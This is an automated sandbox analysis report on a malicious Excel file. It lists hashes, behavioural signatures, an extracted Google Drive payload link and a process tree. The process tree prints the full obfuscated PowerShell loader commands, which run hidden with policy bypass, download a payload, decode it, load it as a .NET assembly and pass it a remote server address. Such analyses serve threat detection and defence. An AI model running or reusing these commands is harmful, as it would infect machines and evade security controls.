Analysis
- max time kernel: 101s
- max time network: 126s
- platform: windows7_x64
- resource: win7-20241010-en
- resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
- submitted: 07/11/2024, 03:18

Static task: static1

Behavioral task: behavioral1
- Sample: d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls
- Resource: win7-20241010-en

Behavioral task: behavioral2
- Sample: d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls
- Resource: win10v2004-20241007-en
General
- Target: d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls
- Size: 1.1MB
- MD5: 9b8d94907c2db1b8ae9ebf84b2099c16
- SHA1: d543e02897263288f2b2a65d7070757d99fed8ff
- SHA256: d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6
- SHA512: cc8d24cee7a41c7cc2ddab9cd5d7ae6b245dcd90fee8b5de1d4001dae83e7c43d3cbd474bc1c4f89fa9ec903d26de680630d8b064328f07b3a04cf827182a972
- SSDEEP: 24576:1yaZxvseowaDI9eqvBw2LyifZSScF1LelExbgwCcH0p1O4uGqdzkxTm:1T0DIRvBwCv0xF1L3MwCA4uIx
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Signatures
Blocklisted process makes network request 5 IoCs
flow  pid   Process
20    2540  mshta.exe
21    2540  mshta.exe
23    2428  POWErsHell.eXE
25    1512  powershell.exe
27    1512  powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Runs PowerShell with its display window hidden.
pid   Process
1512  powershell.exe
964   powershell.exe
Evasion via Device Credential Deployment 2 IoCs
pid   Process
2428  POWErsHell.eXE
2652  powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow  ioc
24    drive.google.com
25    drive.google.com
Drops file in System32 directory 4 IoCs
description                   ioc                                                                                                                          Process
File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  POWErsHell.eXE
File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  EXCEL.EXE
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  POWErsHell.eXE
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  mshta.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WScript.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Enumerates system info in registry 2 TTPs 1 IoCs
description  ioc                                                                   Process
Key opened   \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor  EXCEL.EXE
Modifies Internet Explorer settings 1 IoCs
description  ioc                                                                                                 Process
Key created  \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
Modifies system certificate store 2 IoCs
description       ioc                                                                                                                                           Process
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 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  mshta.exe
Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A  mshta.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid  Process
840  EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid   Process
2428  POWErsHell.eXE
2652  powershell.exe
2428  POWErsHell.eXE
2428  POWErsHell.eXE
964   powershell.exe
1512  powershell.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
description               pid   Process
Token: SeDebugPrivilege   2428  POWErsHell.eXE
Token: SeDebugPrivilege   2652  powershell.exe
Token: SeDebugPrivilege   964   powershell.exe
Token: SeDebugPrivilege   1512  powershell.exe
Suspicious use of SetWindowsHookEx 5 IoCs
pid  Process
840  EXCEL.EXE
840  EXCEL.EXE
840  EXCEL.EXE
840  EXCEL.EXE
840  EXCEL.EXE
Suspicious use of WriteProcessMemory 28 IoCs
description                        pid   Process         procid_target
PID 2540 wrote to memory of 2428   2540  mshta.exe       31
PID 2540 wrote to memory of 2428   2540  mshta.exe       31
PID 2540 wrote to memory of 2428   2540  mshta.exe       31
PID 2540 wrote to memory of 2428   2540  mshta.exe       31
PID 2428 wrote to memory of 2652   2428  POWErsHell.eXE  33
PID 2428 wrote to memory of 2652   2428  POWErsHell.eXE  33
PID 2428 wrote to memory of 2652   2428  POWErsHell.eXE  33
PID 2428 wrote to memory of 2652   2428  POWErsHell.eXE  33
PID 2428 wrote to memory of 1636   2428  POWErsHell.eXE  34
PID 2428 wrote to memory of 1636   2428  POWErsHell.eXE  34
PID 2428 wrote to memory of 1636   2428  POWErsHell.eXE  34
PID 2428 wrote to memory of 1636   2428  POWErsHell.eXE  34
PID 1636 wrote to memory of 1932   1636  csc.exe         35
PID 1636 wrote to memory of 1932   1636  csc.exe         35
PID 1636 wrote to memory of 1932   1636  csc.exe         35
PID 1636 wrote to memory of 1932   1636  csc.exe         35
PID 2428 wrote to memory of 1724   2428  POWErsHell.eXE  36
PID 2428 wrote to memory of 1724   2428  POWErsHell.eXE  36
PID 2428 wrote to memory of 1724   2428  POWErsHell.eXE  36
PID 2428 wrote to memory of 1724   2428  POWErsHell.eXE  36
PID 1724 wrote to memory of 964    1724  WScript.exe     37
PID 1724 wrote to memory of 964    1724  WScript.exe     37
PID 1724 wrote to memory of 964    1724  WScript.exe     37
PID 1724 wrote to memory of 964    1724  WScript.exe     37
PID 964 wrote to memory of 1512    964   powershell.exe  39
PID 964 wrote to memory of 1512    964   powershell.exe  39
PID 964 wrote to memory of 1512    964   powershell.exe  39
PID 964 wrote to memory of 1512    964   powershell.exe  39
Processes (indented entries are children of the entry above them)

- C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (PID 840)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d42ff478f1996a591e02f59a41edda8aee486e9523c14bce04be51cb457cc6e6.xls
  Signatures:
  - System Location Discovery: System Language Discovery
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx

- C:\Windows\SysWOW64\mshta.exe (PID 2540)
  Command line: C:\Windows\SysWOW64\mshta.exe -Embedding
  Signatures:
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE (PID 2428)
    Command line: "C:\Windows\SYsTEM32\WiNdowSpOWerShelL\v1.0\POWErsHell.eXE" "pOWErsheLl.exE -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE ; IeX($(IEx('[syStEm.tEXt.ENcoDing]'+[ChaR]58+[char]58+'Utf8.getStRInG([SYStEm.CONVERT]'+[CHaR]0x3a+[cHaR]0x3A+'fROmbASe64stRinG('+[cHar]0x22+'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'+[ChAr]34+'))')))"
    Signatures:
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2652)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BypaSS -NOp -w 1 -C DeVIcecRedentiaLDepLoYmENT.eXE
      Signatures:
      - Evasion via Device Credential Deployment
      - Drops file in System32 directory
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (PID 1636)
      Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xnxpjgur.cmdline"
      Signatures:
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe (PID 1932)
        Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5BF6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5BE6.tmp"
        Signatures:
        - System Location Discovery: System Language Discovery

    - C:\Windows\SysWOW64\WScript.exe (PID 1724)
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingswithgoodnewsgivenmegreatw.vbs"
      Signatures:
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 964)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Signatures:
        - Command and Scripting Interpreter: PowerShell
        - Drops file in System32 directory
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1512)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pshoME[21]+$PshoMe[34]+'x')( ('7z'+'ximageUrl = K9khttps://driv'+'e.google.com/uc?export'+'=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 K9k;7z'+'xwebClient = New-Object Sys'+'tem.Net.'+'WebClient;7zxi'+'mageByt'+'es = 7z'+'xwebClient.DownloadData(7zximageUrl);7zximageText = [System.Text.Encoding]::UTF8.GetString(7zximageBytes);7zxstartFlag = K9k<<BASE64_START>>K9k;7zxe'+'ndFlag = K9k<<BASE64_END>>K9k;7zxstartIndex = 7zximageText.IndexOf(7zxstartFlag);'+'7zxendIndex = 7zximageText.IndexOf(7z'+'xendFlag);7zxstartIndex -g'+'e 0 -and 7'+'zxendIn'+'dex -gt 7z'+'xstartInd'+'ex;7zxstartIndex += 7zxstartFlag.Length;7zxbase6'+'4Length = 7zxend'+'Index - 7zxstartInd'+'e'+'x;7zxbase64Command'+' = 7zximageT'+'ext.Substring(7zxstartIndex,'+' 7zxbase64Length);7zxbase64Reversed = -join (7zxbase64Command.ToCharArray() aCx ForEach-Object { 7zx_ })'+'[-1..-(7zxbase64Command.Le'+'ngth)];7zxcommandBytes = [System.Convert]::FromBase64String(7z'+'xbase64Reversed);7zxloadedAssembly = [System.Reflect'+'ion.Assembly]::'+'Load(7zxcommandBytes);7zxvaiMethod = [dnlib.IO.Home].GetMethod(K9kVAIK9k);7zxvaiMethod.Invoke(7zxnull, @(K9ktxt.RRIMMA'+'C/712/641.391.3.291//:p'+'tthK9k, K9kdesativadoK9k, K9kdesativad'+'oK9k, K9kdesativadoK9k, K9kaspnet_compilerK9k, K9kdesativadoK9k, '+'K9kd'+'esativadoK9k,K9kdesativadoK9k,K9'+'kdesa'+'tivadoK9k,K9kdesativad'+'oK9k,K9kdesativadoK9k,K9kde'+'sativadoK9k,K9k1K9k,K9kdesativadoK9k));').REplaCE('aCx',[STRIng][CHAR]124).REplaCE(([CHAR]75+[CHAR]57+[CHAR]107),[STRIng][CHAR]39).REplaCE('7zx','$') )"
          Signatures:
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Drops file in System32 directory
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads